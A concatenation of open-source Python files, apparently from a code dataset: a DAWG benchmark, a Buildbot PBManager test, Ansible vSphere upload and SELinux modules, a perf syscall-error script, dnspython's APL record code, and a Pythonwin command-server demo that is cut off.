            "for word in WORDS100k[:50000]: data.similar_keys(word, repl)",
            setup=dawg_setup,
        ),
        op_count=0.05
    )
    bench(
        "DAWG.similar_keys (l33t)",
        timeit.Timer(
            "for word in WORDS100k[:50000]: data.similar_keys(word, repl)",
            setup=leet_dawg_setup,
        ),
        op_count=0.05
    )
    # Prefix-oriented operations (skip plain dict, structures[0]).
    for struct_name, setup in structures[1:]:
        # prefixes of a given key
        _bench_data = [
            ('hits', 'WORDS100k'),
            ('mixed', 'MIXED_WORDS100k'),
            ('misses', 'NON_WORDS100k'),
        ]
        for meth in ['prefixes']:
            for name, data in _bench_data:
                bench(
                    '%s.%s (%s)' % (struct_name, meth, name),
                    timeit.Timer(
                        "for word in %s:\n"
                        "    data.%s(word)" % (data, meth),
                        setup
                    ),
                    runs=3,
                )
        for meth in ['iterprefixes']:
            for name, data in _bench_data:
                bench(
                    '%s.%s (%s)' % (struct_name, meth, name),
                    timeit.Timer(
                        "for word in %s:\n"
                        "    list(data.%s(word))" % (data, meth),
                        setup
                    ),
                    runs=3,
                )
        # keys with a given prefix
        _bench_data = [
            ('xxx', 'avg_len(res)==415', 'PREFIXES_3_1k'),
            ('xxxxx', 'avg_len(res)==17', 'PREFIXES_5_1k'),
            ('xxxxxxxx', 'avg_len(res)==3', 'PREFIXES_8_1k'),
            ('xxxxx..xx', 'avg_len(res)==1.4', 'PREFIXES_15_1k'),
            ('xxx', 'NON_EXISTING', 'NON_WORDS_1k'),
        ]
        for xxx, avg, data in _bench_data:
            for meth in ['keys', 'items']:
                bench(
                    '%s.%s(prefix="%s"), %s' % (struct_name, meth, xxx, avg),
                    timeit.Timer(
                        "for word in %s: data.%s(word)" % (data, meth),
                        setup
                    ),
                    'K ops/sec',
                    op_count=1,
                    runs=3,
                    text_width=60,
                )
            for meth in ['iterkeys', 'iteritems']:
                bench(
                    '%s.%s(prefix="%s"), %s' % (struct_name, meth, xxx, avg),
                    timeit.Timer(
                        "for word in %s: list(data.%s(word))" % (data, meth),
                        setup
                    ),
                    'K ops/sec',
                    op_count=1,
                    runs=3,
                    text_width=60,
                )
def check_dawg(trie, words):
    """Sanity check: looking up every word must yield values summing to
    ``len(words)`` (i.e. 1 per word); raise otherwise."""
    total = sum(trie[word] for word in words)
    if total != len(words):
        raise Exception()
def profiling():
    """Profile BytesDAWG __getitem__ over the 100k-word fixture and print
    the 20 hottest functions."""
    import pstats
    import cProfile
    print('\n====== Profiling =======\n')
    d = create_bytes_dawg()
    WORDS = words100k()
    def check_getitem(trie, words):
        # Hot loop under profile: one lookup per word.
        for word in words:
            trie[word]
    cProfile.runctx("check_getitem(d, WORDS)", globals(), locals(), "Profile.prof")
    # def check_prefixes(trie, words):
    #     for word in words:
    #         trie.keys(word)
    # cProfile.runctx("check_prefixes(d, NON_WORDS_1k)", globals(), locals(), "Profile.prof")
    #
    #cProfile.runctx("check_trie(d, WORDS)", globals(), locals(), "Profile.prof")
    s = pstats.Stats("Profile.prof")
    s.strip_dirs().sort_stats("time").print_stats(20)
if __name__ == '__main__':
    # Run the benchmarks by default; switch to profiling() for cProfile output.
    benchmark()
    #profiling()
print('\n~~~~~~~~~~~~~~\n') | mit |
tardyp/buildbot | master/buildbot/test/unit/test_pbmanager.py | 5 | 6372 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
"""
Test clean shutdown functionality of the master
"""
import mock
from twisted.cred import credentials
from twisted.internet import defer
from twisted.spread import pb
from twisted.trial import unittest
from buildbot import pbmanager
class FakeMaster:
    # Minimal buildmaster stand-in: provides the initLock and the service
    # parenting surface that PBManager expects.
    initLock = defer.DeferredLock()
    def addService(self, svc):
        # Accept any child service; the fake keeps no registry.
        pass
    @property
    def master(self):
        # The real master exposes itself via .master; mirror that here.
        return self
class TestPBManager(unittest.TestCase):
    # Exercises pbmanager.PBManager registration and dispatch without any
    # real TCP traffic: only requestAvatar()/requestAvatarId() are used.
    @defer.inlineCallbacks
    def setUp(self):
        self.pbm = pbmanager.PBManager()
        yield self.pbm.setServiceParent(FakeMaster())
        self.pbm.startService()
        # usernames for which perspectiveFactory was invoked
        self.connections = []
    def tearDown(self):
        return self.pbm.stopService()
    def perspectiveFactory(self, mind, username):
        # Fake perspective factory: records the username and returns a
        # mock whose attached() callback fires immediately.
        persp = mock.Mock()
        persp.is_my_persp = True
        persp.attached = lambda mind: defer.succeed(None)
        self.connections.append(username)
        return defer.succeed(persp)
    @defer.inlineCallbacks
    def test_repr(self):
        reg = yield self.pbm.register(
            'tcp:0:interface=127.0.0.1', "x", "y", self.perspectiveFactory)
        self.assertEqual(repr(self.pbm.dispatchers['tcp:0:interface=127.0.0.1']),
                         '<pbmanager.Dispatcher for x on tcp:0:interface=127.0.0.1>')
        self.assertEqual(
            repr(reg), '<pbmanager.Registration for x on tcp:0:interface=127.0.0.1>')
    @defer.inlineCallbacks
    def test_register_unregister(self):
        portstr = "tcp:0:interface=127.0.0.1"
        reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
        # make sure things look right
        self.assertIn(portstr, self.pbm.dispatchers)
        disp = self.pbm.dispatchers[portstr]
        self.assertIn('boris', disp.users)
        # we can't actually connect to it, as that requires finding the
        # dynamically allocated port number which is buried out of reach;
        # however, we can try the requestAvatar and requestAvatarId methods.
        username = yield disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
        self.assertEqual(username, b'boris')
        avatar = yield disp.requestAvatar(b'boris', mock.Mock(), pb.IPerspective)
        (iface, persp, detach_fn) = avatar
        self.assertTrue(persp.is_my_persp)
        self.assertIn('boris', self.connections)
        yield reg.unregister()
    @defer.inlineCallbacks
    def test_register_no_user(self):
        portstr = "tcp:0:interface=127.0.0.1"
        reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
        # make sure things look right
        self.assertIn(portstr, self.pbm.dispatchers)
        disp = self.pbm.dispatchers[portstr]
        self.assertIn('boris', disp.users)
        # we can't actually connect to it, as that requires finding the
        # dynamically allocated port number which is buried out of reach;
        # however, we can try the requestAvatar and requestAvatarId methods.
        username = yield disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
        self.assertEqual(username, b'boris')
        # an unknown avatar id must be rejected, and the factory not called
        with self.assertRaises(ValueError):
            yield disp.requestAvatar(b'notboris', mock.Mock(), pb.IPerspective)
        self.assertNotIn('boris', self.connections)
        yield reg.unregister()
    @defer.inlineCallbacks
    def test_double_register_unregister(self):
        # two users on the same port share one dispatcher; it disappears
        # only after the last registration is removed
        portstr = "tcp:0:interface=127.0.0.1"
        reg1 = yield self.pbm.register(portstr, "boris", "pass", None)
        reg2 = yield self.pbm.register(portstr, "ivona", "pass", None)
        # make sure things look right
        self.assertEqual(len(self.pbm.dispatchers), 1)
        self.assertIn(portstr, self.pbm.dispatchers)
        disp = self.pbm.dispatchers[portstr]
        self.assertIn('boris', disp.users)
        self.assertIn('ivona', disp.users)
        yield reg1.unregister()
        self.assertEqual(len(self.pbm.dispatchers), 1)
        self.assertIn(portstr, self.pbm.dispatchers)
        disp = self.pbm.dispatchers[portstr]
        self.assertNotIn('boris', disp.users)
        self.assertIn('ivona', disp.users)
        yield reg2.unregister()
        self.assertEqual(len(self.pbm.dispatchers), 0)
    @defer.inlineCallbacks
    def test_requestAvatarId_noinitLock(self):
        portstr = "tcp:0:interface=127.0.0.1"
        reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
        disp = self.pbm.dispatchers[portstr]
        d = disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
        self.assertTrue(d.called,
                        "requestAvatarId should have been called since the lock is free")
        yield reg.unregister()
    @defer.inlineCallbacks
    def test_requestAvatarId_initLock(self):
        portstr = "tcp:0:interface=127.0.0.1"
        reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
        disp = self.pbm.dispatchers[portstr]
        try:
            # simulate a reconfig/restart in progress
            yield self.pbm.master.initLock.acquire()
            # try to authenticate while the lock is locked
            d = disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
            self.assertFalse(d.called,
                             "requestAvatarId should block until the lock is released")
        finally:
            # release the lock, it should allow for auth to proceed
            yield self.pbm.master.initLock.release()
        self.assertTrue(d.called,
                        "requestAvatarId should have been called after the lock was released")
        yield reg.unregister()
| gpl-2.0 |
erwilan/ansible | lib/ansible/modules/cloud/vmware/vsphere_copy.py | 34 | 6561 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Dag Wieers <dag@wieers.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vsphere_copy
short_description: Copy a file to a vCenter datastore
description:
- Upload files to a vCenter datastore
version_added: 2.0
author: Dag Wieers (@dagwieers) <dag@wieers.com>
options:
host:
description:
- The vCenter server on which the datastore is available.
required: true
login:
description:
- The login name to authenticate on the vCenter server.
required: true
password:
description:
- The password to authenticate on the vCenter server.
required: true
src:
description:
- The file to push to vCenter
required: true
datacenter:
description:
- The datacenter on the vCenter server that holds the datastore.
required: true
datastore:
description:
- The datastore on the vCenter server to push files to.
required: true
path:
description:
- The file to push to the datastore on the vCenter server.
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists.
required: false
default: 'yes'
choices: ['yes', 'no']
notes:
- "This module ought to be run from a system that can access vCenter directly and has the file to transfer.
It can be the normal remote target or you can change it either by using C(transport: local) or using C(delegate_to)."
- Tested on vSphere 5.5
'''
EXAMPLES = '''
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /some/local/file
datacenter: DC1 Someplace
datastore: datastore1
path: some/remote/file
transport: local
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /other/local/file
datacenter: DC2 Someplace
datastore: datastore2
path: other/remote/file
delegate_to: other_system
'''
import atexit
import mmap
import errno
import socket
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils.urls import open_url
def vmware_path(datastore, datacenter, path):
    ''' Constructs a URL path that VSphere accepts reliably '''
    # The "/folder/" prefix combined with lstrip("/") guarantees a leading
    # slash, so the old re-check `if not path.startswith("/")` was dead
    # code and has been removed.
    path = "/folder/%s" % path.lstrip("/")
    params = dict(dsName=datastore)
    if datacenter:
        # Due to a software bug in vSphere, it fails to handle ampersand
        # in datacenter names.  The solution is to do what vSphere does
        # (when browsing) and double-encode ampersands.
        params["dcPath"] = datacenter.replace('&', '%26')
    return "%s?%s" % (path, urlencode(params))
def main():
    """Ansible entry point: PUT a local file onto a vCenter datastore."""
    module = AnsibleModule(
        argument_spec = dict(
            host = dict(required=True, aliases=[ 'hostname' ]),
            login = dict(required=True, aliases=[ 'username' ]),
            password = dict(required=True, no_log=True),
            src = dict(required=True, aliases=[ 'name' ]),
            datacenter = dict(required=True),
            datastore = dict(required=True),
            dest = dict(required=True, aliases=[ 'path' ]),
            validate_certs = dict(required=False, default=True, type='bool'),
        ),
        # Implementing check-mode using HEAD is impossible, since size/date is not 100% reliable
        supports_check_mode = False,
    )
    host = module.params.get('host')
    login = module.params.get('login')
    password = module.params.get('password')
    src = module.params.get('src')
    datacenter = module.params.get('datacenter')
    datastore = module.params.get('datastore')
    dest = module.params.get('dest')
    validate_certs = module.params.get('validate_certs')
    # mmap the source so the upload streams without loading it via read();
    # cleanup is deferred to interpreter exit.
    fd = open(src, "rb")
    atexit.register(fd.close)
    data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)
    atexit.register(data.close)
    remote_path = vmware_path(datastore, datacenter, dest)
    url = 'https://%s%s' % (host, remote_path)
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(data)),
    }
    try:
        r = open_url(url, data=data, headers=headers, method='PUT',
                url_username=login, url_password=password, validate_certs=validate_certs,
                force_basic_auth=True)
    except socket.error:
        e = get_exception()
        # NOTE(review): e[0] indexing on exceptions is a Python-2 idiom; on
        # Python 3 this raises TypeError — verify intended interpreter.
        if isinstance(e.args, tuple) and e[0] == errno.ECONNRESET:
            # VSphere resets connection if the file is in use and cannot be replaced
            module.fail_json(msg='Failed to upload, image probably in use', status=None, errno=e[0], reason=str(e), url=url)
        else:
            module.fail_json(msg=str(e), status=None, errno=e[0], reason=str(e), url=url)
    except Exception:
        e = get_exception()
        error_code = -1
        # NOTE(review): indexing an exception raises TypeError, not
        # KeyError, so this except clause likely never matches — confirm.
        try:
            if isinstance(e[0], int):
                error_code = e[0]
        except KeyError:
            pass
        module.fail_json(msg=str(e), status=None, errno=error_code, reason=str(e), url=url)
    status = r.getcode()
    if 200 <= status < 300:
        module.exit_json(changed=True, status=status, reason=r.msg, url=url)
    else:
        # Non-2xx: report response metadata to help diagnose the failure.
        length = r.headers.get('content-length', None)
        if r.headers.get('transfer-encoding', '').lower() == 'chunked':
            chunked = 1
        else:
            chunked = 0
        module.fail_json(msg='Failed to upload', errno=None, status=status, reason=r.msg, length=length, headers=dict(r.headers), chunked=chunked, url=url)
| gpl-3.0 |
j1nx/Amlogic-reff16-kernel | tools/perf/scripts/python/failed-syscalls-by-pid.py | 944 | 1869 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts-by-pid.py [comm]\n";
# Optional single argument restricts the report to one command name.
for_comm = None
if len(sys.argv) > 2:
	sys.exit(usage)
if len(sys.argv) > 1:
	for_comm = sys.argv[1]
# comm -> pid -> syscall id -> errno -> count (auto-vivifying dict).
syscalls = autodict()
def trace_begin():
	# Called once by perf before replaying events; nothing to set up.
	pass
def trace_end():
	# Called once by perf when the trace is finished; emit the report.
	print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
	common_secs, common_nsecs, common_pid, common_comm,
	id, ret):
	# Per-event hook invoked by perf for every sys_exit record; counts
	# only failed syscalls (negative return value).
	if for_comm is not None:
		if common_comm != for_comm:
			return
	if ret < 0:
		# autodict auto-vivifies intermediate levels; the innermost slot
		# starts out as an empty autodict, hence the TypeError fallback
		# on the first increment.
		try:
			syscalls[common_comm][common_pid][id][ret] += 1
		except TypeError:
			syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
	# Dump per-comm/per-pid failed-syscall counts, most frequent errno
	# first (Python 2 print statements; trailing commas suppress newlines).
	if for_comm is not None:
		print "\nsyscall errors for %s:\n\n" % (for_comm),
	else:
		print "\nsyscall errors:\n\n",
	print "%-30s %10s\n" % ("comm [pid]", "count"),
	print "%-30s %10s\n" % ("------------------------------", \
		"----------"),
	comm_keys = syscalls.keys()
	for comm in comm_keys:
		pid_keys = syscalls[comm].keys()
		for pid in pid_keys:
			print "\n%s [%d]\n" % (comm, pid),
			id_keys = syscalls[comm][pid].keys()
			for id in id_keys:
				print "  syscall: %-16d\n" % (id),
				ret_keys = syscalls[comm][pid][id].keys()
				# sort by count descending (Py2 tuple-unpacking lambda)
				for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
					print "    err = %-20d %10d\n" % (ret, val),
| gpl-2.0 |
ptemplier/ansible | lib/ansible/modules/system/selinux.py | 14 | 6747 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Derek Carter<goozbach@friocorte.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: selinux
short_description: Change policy and state of SELinux
description:
- Configures the SELinux mode and policy. A reboot may be required after usage. Ansible will not issue this reboot but will let you know when it is required.
version_added: "0.7"
options:
policy:
description:
- "name of the SELinux policy to use (example: C(targeted)) will be required if state is not C(disabled)"
required: false
default: null
state:
description:
- The SELinux mode
required: true
default: null
choices: [ "enforcing", "permissive", "disabled" ]
conf:
description:
- path to the SELinux configuration file, if non-standard
required: false
default: "/etc/selinux/config"
notes:
- Not tested on any debian based system
requirements: [ libselinux-python ]
author: "Derek Carter (@goozbach) <goozbach@friocorte.com>"
'''
EXAMPLES = '''
# Enable SELinux
- selinux:
policy: targeted
state: enforcing
# Put SELinux in permissive mode, logging actions that would be blocked.
- selinux:
policy: targeted
state: permissive
# Disable SELinux
- selinux:
state: disabled
'''
import os
import re
try:
import selinux
HAS_SELINUX = True
except ImportError:
HAS_SELINUX = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.facts.utils import get_file_lines
# getter subroutines
def get_config_state(configfile):
    """Return the value of the SELINUX= line in *configfile*, or None if
    no such line exists."""
    pattern = re.compile(r'^SELINUX=.*$')
    for line in get_file_lines(configfile):
        if pattern.match(line):
            return line.split('=')[1].strip()
def get_config_policy(configfile):
    """Return the value of the SELINUXTYPE= line in *configfile*, or None if absent."""
    for cfg_line in get_file_lines(configfile):
        if re.match(r'^SELINUXTYPE=.*$', cfg_line):
            return cfg_line.split('=')[1].strip()
# setter subroutines
def set_config_state(state, configfile):
    """Rewrite *configfile* so that its SELINUX= line carries *state*.

    Example result line: ``SELINUX=permissive``.  All other lines are
    written back unchanged.
    """
    replacement = 'SELINUX=%s' % state
    original_lines = get_file_lines(configfile)
    with open(configfile, "w") as out:
        out.write(''.join(re.sub(r'^SELINUX=.*', replacement, ln)
                          for ln in original_lines))
def set_state(module, state):
    """Apply *state* to the running kernel.

    'disabled' is intentionally a no-op here: it can only be applied via
    the config file and a reboot.  An unknown state fails the module.
    """
    runtime_actions = {
        'enforcing': lambda: selinux.security_setenforce(1),
        'permissive': lambda: selinux.security_setenforce(0),
        'disabled': lambda: None,
    }
    action = runtime_actions.get(state)
    if action is None:
        module.fail_json(msg='trying to set invalid runtime state %s' % state)
    else:
        action()
def set_config_policy(policy, configfile):
    """Rewrite *configfile* so that its SELINUXTYPE= line carries *policy*.

    Example result line: ``SELINUXTYPE=targeted``.  All other lines are
    written back unchanged.
    """
    replacement = 'SELINUXTYPE=%s' % policy
    original_lines = get_file_lines(configfile)
    with open(configfile, "w") as out:
        out.write(''.join(re.sub(r'^SELINUXTYPE=.*', replacement, ln)
                          for ln in original_lines))
def main():
    """Module entry point: reconcile runtime and on-disk SELinux settings.

    Compares the requested policy/state against both the running kernel and
    /etc/selinux/config, applies what can be changed at runtime, edits the
    config file for the rest, and reports which changes need a reboot.
    """
    module = AnsibleModule(
        argument_spec=dict(
            policy=dict(required=False),
            state=dict(choices=['enforcing', 'permissive', 'disabled'], required=True),
            configfile=dict(aliases=['conf', 'file'], default='/etc/selinux/config')
        ),
        supports_check_mode=True
    )
    if not HAS_SELINUX:
        module.fail_json(msg='libselinux-python required for this module')
    # global vars
    changed = False
    msgs = []
    configfile = module.params['configfile']
    policy = module.params['policy']
    state = module.params['state']
    # Snapshot what the kernel currently reports.
    runtime_enabled = selinux.is_selinux_enabled()
    runtime_policy = selinux.selinux_getpolicytype()[1]
    runtime_state = 'disabled'
    if runtime_enabled:
        # enabled means 'enforcing' or 'permissive'
        if selinux.security_getenforce():
            runtime_state = 'enforcing'
        else:
            runtime_state = 'permissive'
    if not os.path.isfile(configfile):
        module.fail_json(msg="Unable to find file {0}".format(configfile),
                         details="Please install SELinux-policy package, "
                                 "if this package is not installed previously.")
    config_policy = get_config_policy(configfile)
    config_state = get_config_state(configfile)
    # check to see if policy is set if state is not 'disabled'
    if state != 'disabled':
        if not policy:
            module.fail_json(msg='policy is required if state is not \'disabled\'')
    else:
        # When disabling, fall back to whatever policy the config file names.
        if not policy:
            policy = config_policy
    # check changed values and run changes
    if policy != runtime_policy:
        if module.check_mode:
            module.exit_json(changed=True)
        # cannot change runtime policy
        msgs.append('reboot to change the loaded policy')
        changed = True
    if policy != config_policy:
        if module.check_mode:
            module.exit_json(changed=True)
        msgs.append('config policy changed from \'%s\' to \'%s\'' % (config_policy, policy))
        set_config_policy(policy, configfile)
        changed = True
    if state != runtime_state:
        if module.check_mode:
            module.exit_json(changed=True)
        if runtime_enabled:
            if state == 'disabled':
                if runtime_state != 'permissive':
                    # Temporarily set state to permissive
                    set_state(module, 'permissive')
                    msgs.append('runtime state temporarily changed from \'%s\' to \'permissive\', state change will take effect next reboot' % (runtime_state))
                else:
                    msgs.append('state change will take effect next reboot')
            else:
                set_state(module, state)
                msgs.append('runtime state changed from \'%s\' to \'%s\'' % (runtime_state, state))
        else:
            # SELinux is off at runtime; only the config file can change that.
            msgs.append('state change will take effect next reboot')
        changed = True
    if state != config_state:
        if module.check_mode:
            module.exit_json(changed=True)
        msgs.append('config state changed from \'%s\' to \'%s\'' % (config_state, state))
        set_config_state(state, configfile)
        changed = True
    module.exit_json(changed=changed, msg=', '.join(msgs), configfile=configfile, policy=policy, state=state)
| gpl-3.0 |
renanrodm/namebench | nb_third_party/dns/rdtypes/IN/APL.py | 248 | 5525 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.rdata
import dns.tokenizer
class APLItem(object):
    """An APL list item.
    @ivar family: the address family (IANA address family registry)
    @type family: int
    @ivar negation: is this item negated?
    @type negation: bool
    @ivar address: the address
    @type address: string
    @ivar prefix: the prefix length
    @type prefix: int
    """
    __slots__ = ['family', 'negation', 'address', 'prefix']
    def __init__(self, family, negation, address, prefix):
        self.family = family
        self.negation = negation
        self.address = address
        self.prefix = prefix
    def __str__(self):
        # Presentation format: [!]family:address/prefix (RFC 3123).
        if self.negation:
            return "!%d:%s/%s" % (self.family, self.address, self.prefix)
        else:
            return "%d:%s/%s" % (self.family, self.address, self.prefix)
    def to_wire(self, file):
        """Write this item in wire format: !H family, !B prefix,
        !B (negation-bit | afdlen), then the truncated address bytes."""
        if self.family == 1:
            address = dns.inet.inet_pton(dns.inet.AF_INET, self.address)
        elif self.family == 2:
            address = dns.inet.inet_pton(dns.inet.AF_INET6, self.address)
        else:
            # Unknown families are stored as hex text; decode back to bytes.
            address = self.address.decode('hex_codec')
        #
        # Truncate least significant zero bytes.
        #
        last = 0
        for i in xrange(len(address) - 1, -1, -1):
            if address[i] != chr(0):
                last = i + 1
                break
        address = address[0 : last]
        l = len(address)
        # afdlen occupies only 7 bits; the top bit carries the negation flag.
        assert l < 128
        if self.negation:
            l |= 0x80
        header = struct.pack('!HBB', self.family, self.prefix, l)
        file.write(header)
        file.write(address)
class APL(dns.rdata.Rdata):
    """APL record.
    @ivar items: a list of APL items
    @type items: list of APL_Item
    @see: RFC 3123"""
    __slots__ = ['items']
    def __init__(self, rdclass, rdtype, items):
        super(APL, self).__init__(rdclass, rdtype)
        self.items = items
    def to_text(self, origin=None, relativize=True, **kw):
        # Items are space-separated in presentation format.
        return ' '.join(map(lambda x: str(x), self.items))
    def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
        """Parse tokens of the form [!]family:address/prefix until EOL/EOF."""
        items = []
        while 1:
            token = tok.get().unescape()
            if token.is_eol_or_eof():
                break
            item = token.value
            if item[0] == '!':
                negation = True
                item = item[1:]
            else:
                negation = False
            (family, rest) = item.split(':', 1)
            family = int(family)
            (address, prefix) = rest.split('/', 1)
            prefix = int(prefix)
            item = APLItem(family, negation, address, prefix)
            items.append(item)
        return cls(rdclass, rdtype, items)
    from_text = classmethod(from_text)
    def to_wire(self, file, compress = None, origin = None):
        # The rdata is simply the concatenation of the items' wire forms.
        for item in self.items:
            item.to_wire(file)
    def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
        """Decode items from wire format.

        Each item starts with a 4-byte header (family, prefix,
        negation-bit | afdlen); the address was zero-truncated on the wire,
        so it is re-padded before being converted back to text.
        """
        items = []
        while 1:
            if rdlen < 4:
                raise dns.exception.FormError
            header = struct.unpack('!HBB', wire[current : current + 4])
            afdlen = header[2]
            if afdlen > 127:
                # Top bit of the length byte is the negation flag.
                negation = True
                afdlen -= 128
            else:
                negation = False
            current += 4
            rdlen -= 4
            if rdlen < afdlen:
                raise dns.exception.FormError
            address = wire[current : current + afdlen]
            l = len(address)
            if header[0] == 1:
                if l < 4:
                    address += '\x00' * (4 - l)
                address = dns.inet.inet_ntop(dns.inet.AF_INET, address)
            elif header[0] == 2:
                if l < 16:
                    address += '\x00' * (16 - l)
                address = dns.inet.inet_ntop(dns.inet.AF_INET6, address)
            else:
                #
                # This isn't really right according to the RFC, but it
                # seems better than throwing an exception
                #
                address = address.encode('hex_codec')
            current += afdlen
            rdlen -= afdlen
            item = APLItem(header[0], negation, address, header[1])
            items.append(item)
            if rdlen == 0:
                break
        return cls(rdclass, rdtype, items)
    from_wire = classmethod(from_wire)
    def _cmp(self, other):
        # Compare by canonical wire form of both records.
        f = cStringIO.StringIO()
        self.to_wire(f)
        wire1 = f.getvalue()
        f.seek(0)
        f.truncate()
        other.to_wire(f)
        wire2 = f.getvalue()
        f.close()
        return cmp(wire1, wire2)
| apache-2.0 |
windyuuy/opera | chromium/src/third_party/python_26/Lib/site-packages/pythonwin/pywin/Demos/cmdserver.py | 34 | 2629 | # cmdserver.py
# Demo code that is not Pythonwin related, but too good to throw away...
import win32api
import sys
from pywin.framework import winout
import thread, sys
import traceback
class ThreadWriter:
    """Route sys.stdout through per-thread writer objects - Courtesy Guido!

    The first register() call hijacks sys.stdout; once the last writer is
    unregistered the original stdout is restored.
    """
    def __init__(self):
        """Constructor -- initialize the table of writers."""
        # Maps thread id -> writer object for that thread.
        self.writers = {}
        # The saved sys.stdout; None while no writers are registered.
        self.origStdOut = None
    def register(self, writer):
        """Register the writer for the current thread."""
        tid = thread.get_ident()
        self.writers[tid] = writer
        if self.origStdOut is None:
            self.origStdOut = sys.stdout
            sys.stdout = self
    def unregister(self):
        """Remove the writer for the current thread, if any."""
        self.writers.pop(thread.get_ident(), None)
        if not self.writers:
            sys.stdout = self.origStdOut
            self.origStdOut = None
    def getwriter(self):
        """Return the current thread's writer, default sys.stdout."""
        return self.writers.get(thread.get_ident(), self.origStdOut)
    def write(self, str):
        """Write to the current thread's writer, default sys.stdout."""
        self.getwriter().write(str)
def Test():
    # Demo worker: prints a counter 999 times, sleeping 50ms between
    # prints, to exercise the per-thread stdout redirection above.
    num=1
    while num<1000:
        print 'Hello there no ' + str(num)
        win32api.Sleep(50)
        num = num + 1
class flags:
    # Requested execution mode for StartServer().  NOTE(review): StartServer
    # below always launches a thread regardless of which flag is passed.
    SERVER_BEST = 0
    SERVER_IMMEDIATE = 1
    SERVER_THREAD = 2
    SERVER_PROCESS = 3
def StartServer( cmd, title=None, bCloseOnEnd=0, serverFlags = flags.SERVER_BEST ):
    # Create an idle-flushed Pythonwin output window and run *cmd* in a
    # background thread with its output routed there.  serverFlags is
    # accepted but not consulted - a thread is always used.
    out = winout.WindowOutput( title, None, winout.flags.WQ_IDLE )
    if not title:
        title=cmd
    out.Create(title)
# ServerThread((out, cmd, title, bCloseOnEnd))
# out = sys.stdout
    thread.start_new_thread( ServerThread, (out, cmd, title, bCloseOnEnd) )
def ServerThread(myout, cmd, title, bCloseOnEnd):
    # Thread body: redirect this thread's stdout to *myout* via the
    # module-level ThreadWriter 'writer', exec *cmd* in __main__'s
    # namespace, then report success or the traceback to the window.
    # NOTE(review): depends on a global 'writer' whose creation is
    # commented out at module bottom in this revision - confirm.
    try:
        writer.register(myout)
        print 'Executing "%s"\n' % cmd
        bOK = 1
        try:
            import __main__
            exec (cmd+'\n', __main__.__dict__)
        except:
            bOK = 0
        if bOK:
            print "Command terminated without errors."
        else:
            t, v, tb = sys.exc_info()
            print t, ': ', v
            traceback.print_tb(tb)
            tb = None # prevent a cycle
